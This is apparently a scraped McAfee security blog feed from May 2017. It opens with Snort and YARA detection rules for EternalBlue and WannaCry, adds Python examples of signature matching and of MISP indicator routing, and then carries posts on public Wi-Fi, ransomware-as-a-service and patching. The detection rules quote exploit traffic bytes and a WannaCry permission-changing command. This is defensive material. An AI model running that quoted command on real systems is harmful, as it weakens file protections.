alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)"; flow:to_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
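To show how the request/response pairing in these rules works, here is an added Python re-implementation of their matching logic; it is example code, not part of the original post or of the Emerging Threats ruleset. The 16-byte prefixes are the SMB1 echo request (flags 0x18) and echo response (flags 0x98, reply bit set) headers from the rules, the second content match is the echo data the rules look for, and the detector models the flowbits handshake: a request sets a per-flow flag without alerting, and a response alerts only if the flag was set on the same flow. Flow keys and packet bytes are constructed.

```python
"""Stateful re-implementation of the ETERNALBLUE echo request/response rules.
Added example; packets and flow keys are constructed."""
from typing import Optional, Tuple

# 16-byte prefixes from the rules: NetBIOS session header with length 0x31,
# SMB1 magic, command 0x2b (SMB_COM_ECHO), NT status 0, flags 0x18 (request)
# or 0x98 (reply bit set), flags2 bytes 07 c0.
ECHO_REQUEST_PREFIX = bytes.fromhex("00000031ff") + b"SMB" + bytes.fromhex("2b000000001807c0")
ECHO_RESPONSE_PREFIX = bytes.fromhex("00000031ff") + b"SMB" + bytes.fromhex("2b000000009807c0")
# Echo data looked for by the second content match ("JlJmIhClBsr\0").
ECHO_DATA_MARKER = bytes.fromhex("4a6c4a6d4968436c42737200")

FlowKey = Tuple[str, int, str, int]


def content_match(payload: bytes, prefix: bytes, marker: bytes) -> bool:
    """Mirror 'content:<prefix>; depth:16; content:<marker>; distance:0;'.
    A 16-byte prefix with depth:16 can only match at offset 0, and distance:0
    means the marker must appear anywhere after the end of the prefix."""
    if len(prefix) != 16 or payload[:16] != prefix:
        return False
    return payload.find(marker, 16) != -1


class EternalBlueEchoDetector:
    """Tracks the ETPRO.ETERNALBLUE flowbit per flow, as Snort does."""

    def __init__(self) -> None:
        self._flagged_flows = set()

    def inspect(self, flow_key: FlowKey, direction: str, payload: bytes) -> Optional[str]:
        """direction is 'to_server' or 'from_server'. Returns the alert message
        or None; the request rule never alerts (flowbits:noalert)."""
        if direction == "to_server" and content_match(payload, ECHO_REQUEST_PREFIX, ECHO_DATA_MARKER):
            self._flagged_flows.add(flow_key)        # flowbits:set
            return None
        if direction == "from_server" and content_match(payload, ECHO_RESPONSE_PREFIX, ECHO_DATA_MARKER):
            if flow_key in self._flagged_flows:      # flowbits:isset
                return "ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"
        return None


def run_sample_trace() -> list:
    """Replay a constructed trace: an echo request, its response on the same
    flow, and a look-alike response on a flow that never carried the request."""
    det = EternalBlueEchoDetector()
    flow_a = ("10.0.0.5", 49321, "10.0.0.9", 445)
    flow_b = ("10.0.0.6", 50111, "10.0.0.9", 445)
    echo_req = ECHO_REQUEST_PREFIX + b"\x00" * 20 + ECHO_DATA_MARKER
    echo_resp = ECHO_RESPONSE_PREFIX + b"\x00" * 20 + ECHO_DATA_MARKER
    return [
        det.inspect(flow_a, "to_server", echo_req),     # flag set, no alert
        det.inspect(flow_a, "from_server", echo_resp),  # alert
        det.inspect(flow_b, "from_server", echo_resp),  # no request seen: no alert
    ]

if __name__ == "__main__":
    for result in run_sample_trace():
        print(result)
```

The third event in the trace is why the response rule carries flowbits:isset rather than alerting on the response bytes alone: without the preceding request on the same flow the response is not attributed to the exploit, which keeps the rule from firing on unrelated traffic that happens to share the header bytes.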

 

Yara:

rule wannacry_1 : ransom
{
    meta:
        author = "Joshua Cannell"
        description = "WannaCry Ransomware strings"
        weight = 100
        date = "2017-05-12"

    strings:
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
        $s2 = "Wanna Decryptor" wide ascii nocase
        $s3 = ".wcry" wide ascii nocase
        $s4 = "WANNACRY" wide ascii nocase
        $s5 = "WANACRY!" wide ascii nocase
        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

    condition:
        any of them
}

rule wannacry_2
{
    meta:
        author = "Harold Ogden"
        description = "WannaCry Ransomware Strings"
        date = "2017-05-12"
        weight = 100

    strings:
        $string1 = "msg/m_bulgarian.wnry"
        $string2 = "msg/m_chinese (simplified).wnry"
        $string3 = "msg/m_chinese (traditional).wnry"
        $string4 = "msg/m_croatian.wnry"
        $string5 = "msg/m_czech.wnry"
        $string6 = "msg/m_danish.wnry"
        $string7 = "msg/m_dutch.wnry"
        $string8 = "msg/m_english.wnry"
        $string9 = "msg/m_filipino.wnry"
        $string10 = "msg/m_finnish.wnry"
        $string11 = "msg/m_french.wnry"
        $string12 = "msg/m_german.wnry"
        $string13 = "msg/m_greek.wnry"
        $string14 = "msg/m_indonesian.wnry"
        $string15 = "msg/m_italian.wnry"
        $string16 = "msg/m_japanese.wnry"
        $string17 = "msg/m_korean.wnry"
        $string18 = "msg/m_latvian.wnry"
        $string19 = "msg/m_norwegian.wnry"
        $string20 = "msg/m_polish.wnry"
        $string21 = "msg/m_portuguese.wnry"
        $string22 = "msg/m_romanian.wnry"
        $string23 = "msg/m_russian.wnry"
        $string24 = "msg/m_slovak.wnry"
        $string25 = "msg/m_spanish.wnry"
        $string26 = "msg/m_swedish.wnry"
        $string27 = "msg/m_turkish.wnry"
        $string28 = "msg/m_vietnamese.wnry"

    condition:
        any of ($string*)
}


McAfee urges all its customers to make sure McAfee’s DAT updates have been applied so that they have the latest protection. We furthermore advise customers to be diligent in applying security updates for all the software solutions they use.

For more information on McAfee’s response to WannaCry, please read this Knowledge Center article.

Why You Need to Watch Out When Using Public Wi-Fi
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/need-watch-using-public-wi-fi/
Fri, 12 May 2017 20:43:49 +0000

If you’re like most people, you like to stay connected whether you are traveling or just on the go. That’s why it can be tempting to connect to free, public Wi-Fi networks, but you should know that these networks could open you up to some serious risks.

Public Wi-Fi networks often lack a security measure called encryption, which scrambles the information sent from your computer or device to the router so strangers cannot read it. Without this security measure in place, the information you send over these networks can potentially be intercepted by cybercrooks.

This information could include your banking and social media passwords, as well as your identity information. A nosy cybercriminal could also potentially snoop on you by watching which websites you visit, and what you type into web forms.

In fact, it is so easy to steal your information over unsecured networks that cybercrooks sometimes set up malicious Wi-Fi hotspots in high-traffic areas, like airports, with the intention of grabbing users’ information.

That’s why if you have to connect when you’re away, you should only use secure and well-advertised Wi-Fi networks. You can usually tell if they use encryption because they require a password to join.

If you have to do something sensitive online, like check your bank account balance or make a purchase, try to stick to webpages that start with “HTTPS” rather than just “HTTP”. The “S” stands for secure, and indicates that the site uses encryption to protect your data. You can also look for a green lock icon at the beginning of the browser address, which indicates that the website connection is secure.

If you are on your mobile phone, you can skip the Wi-Fi network altogether and connect using the cellular network. It is somewhat more secure, since it’s harder for cybercrooks to sniff out your individual data from others on the network.

If you travel a lot, consider investing in a Virtual Private Network (VPN), which is a piece of software that allows you to create a secure connection to another network over the Internet. Anyone potentially trying to snoop on you will only see that you are connected to the VPN, and not what you are doing.

Of course, the most important thing is to remember that using public Wi-Fi is always risky, and requires some extra steps to protect your data.

Here are some more tips to help keep you safe:

  • Think twice before connecting to any public Wi-Fi network, especially if it does not require a password to join.
  • Avoid using free, public computers. Cybercriminals sometimes place compromised computers in legitimate Wi-Fi hotspots with the intention of spreading malware or stealing your data.
  • Try to save sensitive transactions, like banking and online shopping, for your secure home or work networks.
  • If you do use a public network, stick to sites that begin with “HTTPS” so you know they are secure. The HTTPS Everywhere browser extension can direct you to encrypted pages when available. Also, look for the green lock icon in the browser’s address bar.
  • When using your laptop, make sure to turn off “sharing” of your folders and devices so no one else on the network can access them. A quick web search can tell you how to do this on your operating system.
  • Use comprehensive security software and keep it up-to-date. If your software includes a firewall, make sure to enable it.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

New Ransomware Adjusts Its Price Based Off Where You Live
https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/
Fri, 12 May 2017 20:21:22 +0000

Discovered on Exploit, a Russian hacking forum, a new kind of RaaS (ransomware-as-a-service) portal named Fatboy Ransomware has emerged. The service, which is currently available for cybercriminals on the forum to leverage for their own benefit, is unique because it’s programmed to change its ransom amount based on the victim’s location, raising the amount in countries with a higher cost of living, based on the Big Mac Index.

The Big Mac Index, first introduced by The Economist in the 1980s, was meant as a lighthearted gauge of currency misalignment, but has grown to become a global standard for measuring international purchasing power parity. Now it is being used by a threat actor using the handle “polnowz,” who has apparently already made $5,321 in ransomware payments off the tool. The cybercriminal also seems to be all about transparency, as anyone that signs up for Fatboy will work directly via Jabber with the author of the product instead of a third-party distributor.

And though it is the first known online extortion product that is designed to automatically change ransom amounts based on the victim’s location, this threat comes as no surprise. Cybercriminals are mostly financially motivated, so it is expected that we see business models that facilitate increased profit. This specific financially-motivated model, ransomware-as-a-service, has been around since at least mid-2015, and was popularized by Tox, a short-lived ransomware service.

So, how does this particular case of RaaS work? The encryption algorithms used are standard, AES-256 and RSA-2048, with the private key stored offsite until the ransom is paid. With RaaS in general, the buyer is responsible for delivering the payload while the developer hosts the other services, so the delivery method can be any of many. If the buyer of the portal wants to check the results of that delivery, they can log into an online panel for infection statistics. Other malware services have found success by adding user-friendly features such as these panels.

Fatboy is not particularly sophisticated as a malware sample, but it is a good indicator that the ransomware business model for cybercriminals is still working. As long as there are sufficient profits, we will see more offerings, tools, and support for cybercriminals without the skills or time to develop their own ransomware.

Now, the next step is to think about protection. Users should keep their security products up-to-date and engage in good security behaviors. As for IT professionals, they should be watching for artifacts of this ransomware. While the infection is generally an executable, Python is used during encryption, so be on the lookout for suspicious activity with .pyc and .pyd files.

And if you do become infected by Fatboy ransomware, No More Ransom has pulled together a plethora of decryption tools victims can leverage, which you can find here. Also, learn more about preventing ransomware here.

If you’re looking to stay up-to-date on Fatboy ransomware and attacks like it, follow @McAfee and @McAfee_Business.

WannaCry: On Old and New Worms (German edition)
https://securingtomorrow.mcafee.com/languages/german/wannacry-uber-alte-und-neue-wurmer/
Fri, 12 May 2017 16:05:19 +0000

On the morning of Friday, May 12, multiple sources in Spain reported the outbreak of a ransomware variant that has since been identified as “WannaCry.”

Immediately after receiving this information, McAfee began analyzing the ransomware samples, preparing remediation guidance, and developing detection updates for our customers.

By Friday afternoon, the McAfee Global Threat Intelligence system had already been updated and was able to detect all known WannaCry variants. In addition, all customers had received the corresponding DAT signature updates.

McAfee urges all its customers to apply these DAT updates and, in addition, to make sure that all available security updates are installed for all other software solutions as well. Further information can be found in this Knowledge Base article.

The WannaCry ransomware attacks observed this week combined worm and ransomware tactics for the first time. The possible abuse of the Eternal Blue exploit had been known for several weeks. Because the patch for the MS-17-010 vulnerability in the Windows operating system had not been deployed on thousands of systems, WannaCry was able to infect hundreds of thousands of computers across all industries around the world within a single day. As with many other ransomware campaigns, these attacks were so successful partly because little or no user involvement was required.

A mix of proven techniques, with the human left out of the loop

WannaCry’s success can be attributed to the fact that the attack was amplified by the vulnerabilities present on many systems across the network. The consequences of the attack were therefore considerably greater than those of conventional ransomware attacks.

Almost all ransomware variants currently in circulation attack individual users, often via spear phishing: the victims receive an email that appears to come from a legitimate sender and tricks the recipient into clicking a link or opening an attachment that downloads or executes malicious code on the victim’s system. In that case, however, only a single computer of the victim is affected.

Remember the late 1990s and early 2000s? Back then, worms such as Code Red, NIMDA, and SQL Slammer, which could activate the malware on a system without user involvement, spread extremely quickly. The WannaCry attacks proceeded very similarly.

We are still trying to determine how the “patient zero” system was infected. In any case, this initial infection was able to spread to every system on the network on which the patch for the MS-17-010 vulnerability was not installed.

The malware’s goal was not to steal data or damage other systems; instead, it carried out a classic ransomware attack, with encrypted files and a ransom demand. In essence, this attack combined two techniques to achieve a particularly large impact.

The WannaCry problem: if the Microsoft vulnerability was present on corporate systems, the ransomware could spread very quickly after infecting one system and compromise many further systems that were likewise not yet protected by the patch Microsoft released in March.

Typically, we observe that cybercriminals like to copy techniques that have already proven effective. Since the WannaCry attack was obviously extremely effective, we must expect further attackers to look for other opportunities. This is made harder for them by the fact that it requires a software vulnerability that enables worm-like behavior.

What is special about this attack is the fact that Microsoft had already released a patch for this critical vulnerability and an active exploit had been made public. Both factors gave the attackers the opportunity and the template to build ransomware with worm capabilities.

Open to exploitation

In the late 1990s, a wide variety of software typically ran on systems, some of which was never used. For example, one worm in the 1990s exploited a vulnerability in a print server that was included by default on all servers, even on systems without an attached printer. In this way the worm could connect to every server on the network through this printer port and infect one system after another.

This tactic has since typically been defeated by the principle of least privilege, which ensures that an application or service may perform only those actions on the system or network that are required for its tasks or functions. This principle has reduced the chances of success for conventional worms, but unpatched vulnerabilities imitate this “open” element so that it can be exploited. This applies in particular to vulnerabilities that enable file transfers or file shares to other systems.

The coordination of campaigns such as WannaCry is made considerably easier by all the unpatched vulnerabilities, the published exploit, and the numerous proven ransomware technologies and tactics available to attackers.

To patch or not to patch?

WannaCry should remind IT managers of the urgency of rapid patch deployment. One of the reasons IT managers hesitate to patch, or to run internal quality assurance checks, is the question of whether software incompatibility problems will arise. In my opinion the question should be framed differently: whenever a patch is released, there is always a risk in applying the patch and a risk in not applying it. IT managers must understand and be able to assess the respective consequences for their organization.

By delaying a patch deployment, they can minimize the risk of an application incompatibility. At the same time, however, they increase the risk of compromise by a threat that exploits precisely this vulnerability. For each patch, IT managers must understand how high and how serious these risks are, and then decide how to minimize the risk to the organization.

Events such as WannaCry have the potential to change this way of thinking. One of the problems we frequently observe with regard to security is the belief that the absence of attacks equates to a working defense. Organizations that today take a rather relaxed approach to applying patches may simply not yet have experienced attacks that exploit precisely these vulnerabilities. That can reinforce the attitude that postponing patch deployments is acceptable.

This incident should, however, remind organizations that they need a strict patch deployment plan in order to reduce the vulnerabilities in their environment.

Why were hospitals attacked?

Hospitals fall into a category I call “soft targets,” meaning they usually focus first and foremost on patient care and less on having the best possible cyber defense staff and the best possible technologies for protection against cyberattacks.

That is because, in the past, attacks on hospitals were considered of little interest to cybercriminals. They might have been able to steal patient records or other data, but the total value of the data in a hospital is usually lower than the value of the data stolen in bulk from other industries (for example, financial services).

Ransomware has made it worthwhile for criminals to attack any organization. Since the criminals are solely interested in the ransom demand, it is considerably easier to attack an organization with weak cyber defenses than one with strong protective measures. That is why hospitals, schools, municipal police departments, and universities fell victim to ransomware attacks over the past year. While we are now also observing some attacks on “harder targets,” criminals still have numerous opportunities to continue their attacks on these soft targets.

Wie geht es weiter?

Obwohl dieser Angriff neu ist und einige Überlegungen auslösen sollte, dürfen wir Folgendes nicht vergessen: Wenn bekanntermaßen eine Schwachstelle im Umlauf ist und ein Exploit veröffentlicht wurde, das von Cyber-Kriminellen ausgenutzt werden könnte, müssen wir immer mit derartigen Angriffen rechnen und darauf vorbereitet sein, dass schon bald zahlreiche Nachahmerangriffe folgen werden.

The post WannaCry – über alte und neue Würmer appeared first on McAfee Blogs.

Expanding Automated Threat Hunting and Response with Open DXL
https://securingtomorrow.mcafee.com/business/optimize-operations/expanding-automated-threat-hunting-response-open-dxl/
Fri, 12 May 2017 16:00:09 +0000

The post Expanding Automated Threat Hunting and Response with Open DXL appeared first on McAfee Blogs.

Today everyone is talking about security automation. However, what are the right processes and actions to automate safely? What are the right processes and actions to automate that will actually achieve a security outcome, such as improving security operations efficiency or reducing attacker dwell time? Look at any recent industry report and you will find a statistic about how long attackers linger in a network without detection. It’s getting better, but the average is still heavily in favor of the attacker.

One of the reasons why attackers are so successful at maintaining persistence is that most organizations struggle to make effective use of threat intelligence. Making effective use means taking the volumes of threat intelligence data, primarily technical Indicators of Compromise (IOCs), hunting for affected systems with those IOCs, and then adapting countermeasures to contain the incident or simply update protection. These critical tasks, collecting and validating intelligence, performing triage, and adapting cyber defenses to contain an incident, must be automated if we ever want to get ahead of the attackers.

McAfee’s Intelligent Security Operations solution automates many key threat hunting tasks. In this solution, McAfee Advanced Threat Defense (ATD), a malware analytic system, produces the local IOCs based on malware submissions from the endpoint and network sensors. It automatically shares the new intelligence with McAfee Enterprise Security Manager (ESM) for automated historical analysis, with the McAfee Active Response component of McAfee Endpoint Threat Defense and Response (ETDR) for real time endpoint analysis, and with McAfee Threat Intelligence Exchange (TIE) for automated containment at the endpoint or network.

However, wouldn’t it be great if we could automate hunting and incident containment for all threat intelligence, not just file hashes? We can expand the capability of the Intelligent Security Operations solution to handle more intelligence and automate more incident response tasks using the power of OpenDXL.

Consolidate Threat Intelligence Collection with OpenDXL and MISP

Organizations need threat intelligence from three different sources:

  • Global intelligence from vendors or large providers
  • Community intelligence from closed sources
  • Enterprise, or locally produced, intelligence

Local threat intelligence, typically produced by malware sandboxes, such as McAfee Advanced Threat Defense (ATD), or learned from previous incident investigations, usually relates to attacks targeted at the enterprise and would not be visible through other external intelligence feeds. Large organizations typically consolidate these feeds inside a threat intelligence platform to simplify the management, sharing and processing of the data.

Using OpenDXL, we can more simply push locally-produced intelligence from ATD into threat intelligence platforms, such as Malware Information Sharing Platform (MISP), an open source intelligence sharing platform. Inside MISP, ATD data can be labeled and combined with other sources providing a central repository to operationalize threat intelligence. Using OpenDXL, MISP can then push all threat intelligence-based IOCs to ESM and Active Response for further triage and out to firewalls, proxies, endpoints and other cyber defense tools for automated containment.

Full IOC Hunting with ESM, Active Response and OpenDXL

One of the best ways to reduce attacker dwell time is to use threat intelligence to hunt for compromised systems in the enterprise with ESM and Active Response. With threat intelligence centrally collected in MISP, we can automate historical analysis using the existing back trace feature in ESM. Using the OpenDXL integration with MISP, we can also hunt on all the IOCs and send the results back to ESM or Kibana. This expands the capability of the original solution by fully automating the hunting process, with both historical and real time searches for all IOCs, not just local intelligence.

Automated Incident Containment with OpenDXL

If a system is found to be compromised, the next task is to contain it and update defenses as fast as possible. When it comes to updating cyber defense countermeasures, such as firewalls or web proxies, internal procedures or business silos can slow response. For example, sending a ticket to the firewall team or service provider to block a command-and-control IP address or domain can take hours even in mature organizations. These silos slow down incident response and increase attackers’ dwell time.

With the OpenDXL integration with MISP, we can reduce dwell time by pushing all indicators, not just file hashes, out to network and endpoint countermeasures. Indicators such as command-and-control IP addresses, malicious URLs or domains, and file hashes can be automatically shared with McAfee Dynamic Endpoint, network firewalls such as Forcepoint or Check Point, or web proxies such as McAfee Web Gateway. In this way we can automate indicator sharing with any countermeasure on the network or endpoint, reducing dwell time and better protecting your business.
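The hunting step above (ESM/Active Response over all IOCs) and the containment step in this section, as an added example that is not McAfee’s, MISP’s or OpenDXL’s own code: it validates and normalizes the to_ids attributes of a constructed MISP event, groups them into per-countermeasure lists keyed by hypothetical DXL topic names, and runs a boundary-aware historical hunt over constructed log lines. The DXL publish call and the ESM/Active Response queries are omitted so that it runs offline.

```python
"""MISP -> OpenDXL pipeline sketch: validate and route indicators, hunt in logs.

Added example, not McAfee's, MISP's or OpenDXL's own code. Pure functions so it
runs offline: the MISP event, log lines and DXL topic names are constructed
placeholders (the topics are not real OpenDXL topic names).
"""
import ipaddress
import json
import re

# Constructed MISP event in MISP's JSON layout. "to_ids" is MISP's flag that an
# attribute is meant for detection/blocking; without it the attribute is analyst
# context and must never reach a countermeasure.
SAMPLE_MISP_EVENT = json.dumps({"Event": {"info": "ATD verdict (constructed)", "Attribute": [
    {"type": "ip-dst", "value": "203.0.113.45", "to_ids": True},
    {"type": "domain", "value": "C2.invalid-example.test.", "to_ids": True},  # needs normalizing
    {"type": "url", "value": "http://c2.invalid-example.test/gate.php", "to_ids": True},
    {"type": "sha256", "value": "DEADBEEF" * 8, "to_ids": True},
    {"type": "md5", "value": "not-a-hash", "to_ids": True},        # malformed: dropped
    {"type": "ip-dst", "value": "198.51.100.9", "to_ids": False},  # context only: dropped
]}})

# Constructed proxy/firewall/EDR log lines for the historical hunt.
SAMPLE_LOGS = [
    "proxy user=alice dst=c2.invalid-example.test url=http://c2.invalid-example.test/gate.php",
    "fw allow src=10.0.0.7 dst=203.0.113.45 dport=443",
    "fw allow src=10.0.0.8 dst=203.0.113.450 dport=443",   # near miss, must not hit
    "proxy user=bob dst=notc2.invalid-example.test",       # near miss, must not hit
    "edr host=ws17 sha256=" + "deadbeef" * 8,
]

# Which countermeasure acts on which MISP attribute type, and the hypothetical
# DXL topic each one would subscribe to.
ROUTES = {"ip-dst": ("firewall",), "domain": ("firewall", "web_proxy"),
          "url": ("web_proxy",), "md5": ("endpoint",), "sha256": ("endpoint",)}
DXL_TOPICS = {"firewall": "/example/ioc/firewall", "web_proxy": "/example/ioc/webproxy",
              "endpoint": "/example/ioc/endpoint"}
HASH_LEN = {"md5": 32, "sha256": 64}
DOMAIN_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$")


def normalize(ioc_type, value):
    """Canonical form of an indicator, or None if it is malformed or of a type
    nothing here acts on. A bad value pushed to a firewall is a self-inflicted outage."""
    value = value.strip()
    if ioc_type in HASH_LEN:
        value = value.lower()
        return value if re.fullmatch(r"[0-9a-f]{%d}" % HASH_LEN[ioc_type], value) else None
    if ioc_type == "ip-dst":
        try:
            return str(ipaddress.ip_address(value))
        except ValueError:
            return None
    if ioc_type == "domain":
        value = value.lower().rstrip(".")
        return value if DOMAIN_RE.match(value) else None
    if ioc_type == "url":
        return value if re.fullmatch(r"https?://\S+", value) else None
    return None


def load_indicators(misp_event_json):
    """(type, value) pairs flagged to_ids in a MISP event, validated and normalized."""
    out = []
    for attr in json.loads(misp_event_json)["Event"]["Attribute"]:
        if attr.get("to_ids"):
            value = normalize(attr["type"], attr["value"])
            if value is not None:
                out.append((attr["type"], value))
    return out


def route(indicators):
    """Containment plan {dxl_topic: sorted values}; each list would go out as one
    DXL event to that topic's subscribers (the publish step is omitted here)."""
    plan = {}
    for ioc_type, value in indicators:
        for cm in ROUTES.get(ioc_type, ()):
            plan.setdefault(DXL_TOPICS[cm], set()).add(value)
    return {topic: sorted(values) for topic, values in plan.items()}


def _pattern(ioc_type, value):
    """Boundary-aware regex: 10.0.0.1 must not match 10.0.0.10, and a domain
    matches its subdomains but not look-alike names such as notc2.example."""
    esc = re.escape(value)
    if ioc_type == "ip-dst":
        return re.compile(r"(?<![\d.])" + esc + r"(?![\d.])")
    if ioc_type == "domain":
        return re.compile(r"(?<![\w-])" + esc + r"(?![\w-])")
    if ioc_type in HASH_LEN:
        return re.compile(r"(?<![0-9a-f])" + esc + r"(?![0-9a-f])", re.IGNORECASE)
    return re.compile(esc)


def hunt(indicators, log_lines):
    """Historical hunt over log lines: one (line_number, type, value) per IOC hit."""
    compiled = [(t, v, _pattern(t, v)) for t, v in indicators]
    return [(n, t, v) for n, line in enumerate(log_lines, 1)
            for t, v, pat in compiled if pat.search(line)]
```

Calling `route(load_indicators(SAMPLE_MISP_EVENT))` yields the per-topic lists and `hunt(...)` over `SAMPLE_LOGS` flags lines 1, 2 and 5 while the two near-miss lines stay clean.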

For more information on automated threat hunting with OpenDXL and to get connected with the community of OpenDXL users, I’d encourage you to check out the McAfee DXL architecture guide and the data sheet.

WannaCry : les vers d’hier font peau neuve (WannaCry: yesterday’s worms get a makeover)
https://securingtomorrow.mcafee.com/languages/francais/wannacry-les-vers-dhier-font-peau-neuve/
Fri, 12 May 2017 15:44:17 +0000

The post WannaCry : les vers d’hier font peau neuve appeared first on McAfee Blogs.

On the morning of Friday, 12 May, numerous sources in Spain were the first to report the appearance of a wave of cyber attacks carried out with the ransomware now identified as WannaCry.

As soon as McAfee was informed of these incidents, our team immediately set about analysing samples of this ransomware. We developed detection updates as well as prevention guidance for our customers.

On Friday afternoon, the McAfee Global Threat Intelligence system was updated to identify all known WannaCry samples. In addition, we provided all our customers with signature (DAT file) updates.

We strongly advise them not only to make sure these DAT updates have been applied, but also to ensure that the required security updates for all the software solutions they use have been deployed. For more information, please see this Knowledge Center article.

The WannaCry offensive was unprecedented: it was the first time an operating mode combining typical worm tactics with the ransomware business model had been observed. Turning the Eternal Blue exploit, made public several weeks earlier, into an attack tool and taking advantage of thousands of Windows operating system vulnerabilities still present despite the release of the MS-17-010 patch allowed WannaCry to infect hundreds of thousands of computers. Every industry and the entire planet were hit, in barely a day. Moreover, unlike typical ransomware distribution campaigns, these attacks required little or no human intervention.

A cross between proven methods, without the human factor

WannaCry’s success is due to its ability to amplify each attack by exploiting the vulnerabilities of many machines connected to the network. Its impact is therefore far greater than that of the conventional ransomware campaigns observed so far.

Practically all ransomware currently in circulation targets individual users, often through spear phishing. Targets generally receive an email that appears to come from a legitimate sender and entices them to click a link or open an attachment, which downloads or executes malicious code on the recipient’s system. This type of attack, however, affects only the victim’s computer.

In the 1990s and early 2000s, in the days of Code Red, NIMDA and SQL Slammer, those worms spread rapidly because they did not need human help to activate the malware on computers. The attacks that raged in mid-May behaved similarly.

We are still trying to determine how a “patient zero” machine came to be infected, but we know that from that first infection, other systems lacking the MS-17-010 patch were contaminated over their network.

Rather than stealing data or damaging other machines, the malware carried out a classic ransomware attack, encrypting files and demanding a ransom. Two techniques were combined to produce maximum impact.

Where an organization’s systems had the vulnerability in question (for which Microsoft had released a security update in March), the WannaCry ransomware could infect a first computer, then spread very quickly and reach many other machines lacking the relevant patch.

In cybercrime, we know that when a technique proves effective, it is almost systematically copied. Given the impressive success of this cyber attack, it is reasonable to think it will inspire other attackers. It will be difficult to replicate, however, because this type of approach requires a software vulnerability whose characteristics allow worm-like behaviour.

The WannaCry attack is unique in that it took advantage both of a critical vulnerability for which Microsoft had already released a patch and of an active exploit that ended up on the Internet, accessible to anyone: these two factors gave its author the opportunity and the operating model to create this very particular ransomware worm.

An opening for exploits

In the late 1990s it was common to let all sorts of software run on computers even when it was not being used. One of the worms active at that time took advantage of a vulnerability in print server software that was included by default on all servers, even when the configuration had no printer at all. Every server on the network was therefore exposed to the risk of a worm connecting to its printer port, creating a propagation scenario in which the worm could infect one system after another.

To counter this type of attack, a best practice called the “principle of least privilege” was adopted. Under it, an application or service runs on a machine or network only what is strictly necessary to carry out the tasks or functions specific to its role. Applying this principle limited the risk of attacks by traditional worms, but unpatched vulnerabilities likewise leave a door open through which exploits can rush in, particularly when they allow file transfers, sharing between systems and the like.

It would be very complicated to orchestrate attacks such as the WannaCry campaign without unpatched vulnerabilities, without a publicly released exploit and without a set of proven ransomware technologies and tactics.

To patch or not to patch, that is the question

WannaCry should remind IT teams how essential it is to apply required patches quickly. One of the reasons they hesitate to patch their systems or to run internal quality control is that they want to make sure there are no software compatibility problems. I look at the question from a different angle: when a patch is available, both applying it and not applying it carry some risk. One of the IT manager’s roles is to weigh those respective risks and assess what they mean for their organization.

In some cases, delaying a patch deployment limits the risk of incompatibility. In others, it increases the risk of compromise by a threat that would exploit an existing vulnerability. For each patch, the IT team must determine the level of risk associated with each scenario and then make the right decision, the one that puts the organization at the least possible risk.

Major incidents such as WannaCry will probably weigh in the balance during that analysis. Security teams often interpret the absence of attacks as proof that their defenses are effective. This is not so. It is entirely possible that organizations that are lax about applying patches have simply not yet suffered attacks exploiting the vulnerabilities concerned. That can reinforce the idea that deferred deployment is not a problem.

But this massive attack in May should remind organizations that they absolutely must adopt a rigorous strategy for fixing the vulnerabilities in their environment.

Why hospitals?

Hospitals are vulnerable targets because their first concern is, obviously, patient care rather than deploying the best cyber-defense technologies or recruiting qualified cybersecurity staff.

In fact, until now, cyber criminals had very little to gain from these institutions. It was always possible to steal medical records or other types of data, but in terms of total value, data from a hospital was generally less attractive than data stolen from companies in sectors such as financial services.

With the criminal business model of ransomware, every industry becomes a potentially attractive target. Since the attacker’s objective is the ransom, it is easier to go after an organization with weak cyber defenses than a company with effective protection. That is why hospitals, police departments, schools and universities were hit by ransomware last year. We are also beginning to see increased interest in less vulnerable organizations, but for now at least, attackers still have plenty of opportunities to target these easier prey.

And tomorrow?

Even if the WannaCry attack has unprecedented characteristics that will need to be taken into account in future, when a vulnerability is publicly reported and an exploit is released that could be used by cyber criminals, we must expect an attack of this kind and prepare for it. And, very quickly, for many others inspired by it.

Email, email, in the cloud
https://securingtomorrow.mcafee.com/business/cloud-security/email-email-in-the-cloud/
Thu, 11 May 2017 23:10:14 +0000

The post Email, email, in the cloud appeared first on McAfee Blogs.

As my company continues to move enterprise applications to the cloud, the latest development presents a security opportunity. We are giving up our on-premises Microsoft Exchange email in favor of the Microsoft Office 365 service. With the transition, we might be able to curtail the common employee practice of communicating and storing sensitive business-related data in email.

Trouble Ticket

At issue: The company email system is moving to the cloud.
Action plan: Work with IT to make sure information is better secured after the change than it is now.

I am encouraging the IT organization to tighten security by implementing controls that were either not available in our on-premises deployment or never implemented. The first order of business is a cleanup of accounts and distribution lists. We have hundreds of email-enabled distribution lists, and too many of them are available to the world. We should be able to cut down the number of lists and set rules about who can use them.

For example, one list that includes all members of the customer support team has been available to anyone, though only internal employees have a need for it. Customers will have access to a separate support distribution list that will integrate with Salesforce to automatically generate a support ticket.

We will also restrict to managers the ability to send to “all.” Too many people use the “all” alias to send messages that most employees perceive as spam. That’s a problem in a growing company.

Then there’s auto-forwarding. Doing it internally is one thing (having your mail go to a co-worker while you’re on vacation, for example), but auto-forwarding to personal email accounts simply increases the potential for data loss. Now we can disable auto-forwarding for some employees or restrict the domains they can auto-forward mail to.

